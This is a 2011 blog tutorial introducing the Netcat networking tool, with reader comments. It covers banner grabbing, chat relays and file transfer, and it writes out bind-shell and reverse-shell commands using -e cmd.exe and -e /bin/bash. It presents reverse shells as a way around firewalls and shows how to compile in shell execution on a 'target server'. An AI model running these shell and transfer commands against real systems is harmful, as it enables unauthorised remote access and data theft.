Friday, December 16, 2011

NETCAT 101

Today I will go over the basics of the Netcat tool. This is a tool that can be used by anyone and can be used for many purposes. I will try to present a basic introduction to its general use, with a bias towards hacking aspects, and if you’re lucky I might follow up with some more advanced tutorials down the road. This should provide you with enough to get started and on your way. I will present everything in the usual manner, so try to keep up…

Prerequisites:
-          Copy of Netcat: http://www.downloadnetcat.com/
o   This download contains both the Linux make files which can be easily compiled as well as the windows .exe binary file. If you need help with the Linux compiling there are some notes in the readme & hobbit text files included with download.
o   Microsoft .EXE Version: http://www.downloadnetcat.com/nc11nt.zip
-           Access to testing machine(s)
o   I will present the tutorial using multiple machines, but this can all be done within a single machine if you do not have the proper resources available (It is just 10x easier to show and explain with two machines). Check the readme for some guidance if you don’t get things after reading the tutorial
-          A Brain and some common sense J

WHAT IS NETCAT?
Netcat is a program or utility which reads and writes data across network connections, using TCP or UDP protocol. In its simplest form it creates a TCP connection to the target port of the target host.  Your standard input is then sent to the host, and anything that comes back through the connection is sent to your standard output. Netcat can function as either the server or client in the connection relationship. You can enable it to listen for inbound connections on any port or user specified port as well as the ability to be used for outbound connections as well. You can even bind a service or program to the connection so it is served up to the other end of the connection (you know, things like /bin/bash or cmd.exe). Netcat can also work in UDP mode in the same manner as TCP, but I won’t be covering this much here as I will leave this for a more advanced follow up. I encourage you to read the readme and hobbit text files included with the download as they provide some good insight into the inner workings of this great tool. I will now try to show some examples of how we can use it to accomplish some basic stuff, but first run the help menu to see the available options:

NOTE: I used the additional “-s <Insert-Source-IP>” flag to define the source IP address. I did this as I am running the examples through my localhost and virtual machines. I was having problems with getting successful connection when listening on any IP, which is the default behavior…
BANNER GRABBING:
We can use Netcat to do some quick banner grabbing to see what type of system a target site is using, we use this simple command:

COMMAND(from Machine A): nc -v www.targetsite.com 80
NOTE: you can use IP address as well instead of www.name.com if you prefer

This will make a basic connection to www.targetsite.com on port 80, now you will need to type the following to read the HTTP header to find out some basic info about the target site/server:

IN EXISTING  COMMAND PROMPT:
GET / HTTP/1.0
OR
HEAD / HTTP/1.0
<ENTER>
<ENTER>
...
RESPONSE:

OR it might look more like this one:


The point is that we can use Netcat to do port checks and banner grabs very easily. You can even change the port number to check the banners for different ports to see what version a particular service may be running. If you review the images above you can see we can find out the server type, version info, etc. You never really know what you will find running on a target host unless you check and sometimes you may just stumble across some low hanging fruit (outdated IIS, Apache, and others with well-known and publicly available exploits).

BASIC NETCAT CONNECTION OR CHAT RELAY:
If we want to use NETCAT in its most basic form of sending input from Machine A to Machine B we can simply create a listener and connect to it. Anything you type on one end will come out on the other side, which can make for a crude way to have a two way chat session. It looks like this to set things up:

COMMAND (from Machine A): nc –v –l –p 31337


COMMAND (from Machine B): nc –v <Insert-Machine A IP Address> 31337
First we create a listener on Machine A. Once we have the listener established, we enter the other commands on Machine B in which instruct Netcat to make an outbound connection to the Machine A IP address on port 31337. Once this is done you have a successful Netcat connection which can relay input from Machine A to Machine B, allowing you to create your very own chat relay. Try it with a friend!

OK, that’s cool H.R. but why don’t you show me something cool you say….

OK, how about we review how we can use Netcat to setup a BIND SHELL or a REVERSE CONNECT SHELL!

Yes that’s right, we can use Netcat and its ability to open inbound and outbound connections and take it a step further. We will use Netcat with the “-e” argument to execute a program and bind that program to our defined port. In this example I will be using the cmd.exe on windows and the /bin/bash shell for Linux allowing us to be greeted with command shell access upon successful Netcat connection between Machine A and Machine B. The commands to set this up looks like this:

BIND SHELL:
COMMAND(from Machine A): nc –v –l –p 31337 –s <Insert Source IP for Machine A> –e cmd.exe
NOTE: I used the optional “-s <Insert-Source-IP>” flag to define the source IP address.

COMMAND(from Machine B): nc –v <Insert Machine A IP Address> 31337

This will BIND cmd.exe with the Netcat listener on Machine A to port 31337 (the –s flag is optional). When we connect to Machine A from Machine B we will be greeted with the cmd.exe command console allowing us to execute commands on Machine A from Machine B.

*SPECIAL NOTE*: The above was for a Windows environment. Under Linux the process is entirely the same except you would need to change the “–e cmd.exe” to “–e /bin/bash” on Machine A which is spawning the listener with the binded command shell. The above would look like this for Linux:

COMMAND(from Machine A): nc –v –l –p 31337 –e /bin/bash –s <Insert Source IP for Machine A>
NOTE: I used the optional “-s <Insert-Source-IP>” flag to define the source IP address.

COMMAND(from Machine B): nc –v <Insert Machine A IP Address> 31337


FULL Picture:

A special note that the “-l” will only establish a temporary listener that will be killed when the connection is terminated. If you would like to keep a persistent listener then you can change to the uppercase version or “-L”. This can be a dangerous thing to do as there is no authentication mechanism built into Netcat itself, so if you do this do it with caution. That basically sums up how to use Netcat to setup a BIND shell, now let’s cover how to setup a reverse or back-connect shell so we can have the executed command shell phone home J

REVERSE OR BACK CONNECT SHELL:
Above we setup a listener on the target site which we had executing shell commands when we connected. This was cool, but we can modify things a bit and change it so that we create a reverse or back-connect shell on are target site and then we can have our command shell phone home. This is also another way you can increase your chances of evading ingress filters and firewall restrictions if the BIND method is not working. The command syntax will be similar to what we used above but we will modify slightly so that instead of listening we are back-connecting (as well as executing our /bin/bash shell). It will look like this:

COMMAND(from Machine B): nc –v –l -p 31337 –s <Insert Source IP for Machine B >
NOTE: I used the optional “-s <Insert-Source-IP>” flag to define the source IP address.

COMMAND(from Machine A): nc –v <Insert Machine B IP Address> –p 31337 –e /bin/bash

Upon Connection Machine B will be granted a /bin/bash shell in which they can then execute commands on Machine A from Machine B. We have successfully back-connected a working shell from Machine A to Machine B using Netcat!


NOTE: I had to back-connect from another PC running Linux due to no luck on Virtual Machine for some unknown reasons. I also had to temporarily disable my AV firewall as well as Windows firewall for the back-connect to be accepted on my Windows 7 machine (Machine B). This is not required in all cases but I could not get it to work despite my efforts to set up custom rules and exceptions. This is not a safe practice but it allows the connection through, so don’t forget to turn things back on when you are done…

COPY FILE FROM ONE MACHINE TO ANOTHER USING NETCAT:
OK, so we have a file on our target server (Machine B in this case) and we want to transfer it to our local machine (Machine A)…here is how we can do it using Netcat:

COMMAND(from Machine A): nc –v –l –p 31337 –s <Insert Source IP Address> > FileReceivedUponConnection.txt

COMMAND(from Machine B): nc –v <Insert Machine A IP Address> 31337 < FileToSendUponConnection.txt


We basically create a listener on Machine A, in this case our Linux box, and we point it to take anything received upon connection and send it to MachineA-received.txt file. We then create an outbound connection from our local Machine B to Machine A and we tell it to send the MachineB-test.txt file upon connection (regardless if it is requested or not). Upon connection we see the creation of the text file on Machine A with its new relabeled file name MachineA-received.txt, inside contains the exact content from the file sent by Machine B


OK, well that sums up my basic introduction to the wonderful network tool that is NETCAT. I hope you have found this tutorial informative and helpful. If you are starting out in the world of admins, security and/or hacking then you MUST get these basics down if you want to elevate your skills and take things to the next level. As always and until next time, Enjoy!

BONUS VIDEO:


A FEW SPECIAL NOTES:
NCAT:
·         You can also use the newer program NCAT which is included in the latest NMAP download/installation. The command syntax is almost identical but you may need to review the help menu for a quick review of the subtle differences, repeat evertything here with ncat instead of nc or netcat and it should work for you.
COMPILING NETCAT:
·         If you need to compile Netcat from source under a Linux environment here is a quick run through of the steps you would need to take:
1.       Upload the source files included in the download to your target server you want to use Netcat on, you may want to create a new folder just for it to keep things clean until you have the hang of things…
2.       Open command terminal in the directory you just uploading everything into
§  COMMAND: cd /path/to/upload/nc
3.       Now we need to configure the source followed by a make command. I like to do this in one step and combine the two by using the && to combine the commands
§  COMMAND: ./configure && make <Insert SYSTEM Type> -DGAPING_SECURITY_HOLE -DTELNET
o   Supported SYSTEMS include: Linux, MSDOS, generic, SunOS, Solaris, AIX, HPUX, FreeBSD, and a few others. If you need the full list you can review the source or you can simply choose to compile with the “generic” system definition.
o   “-DGAPING_SECURITY_HOLE” allows us to execute programs like command shells, so this will be needed if you are trying to create a BIND or Back-Connect Shell
o   “–DTELNET” allows us to enable support for auto-negotiation in our netcat so that we can use it to connect to a telnet server should we want it to (if we are compiling from scratch anyways, why not)
4.       COMMAND: nc –h

Type this at the command console you are using and hopefully you are properly greeted with the help menu for Netcat.



4 comments:

  1. Ausum tutorial :)) keep 0n g0ing :d

    ReplyDelete
  2. Lol, very nice man. Should help with transferring files to some team mates

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete
  4. Great post!
    You should also have a look at this http://h.ackack.net/cheatsheets/netcat

    ReplyDelete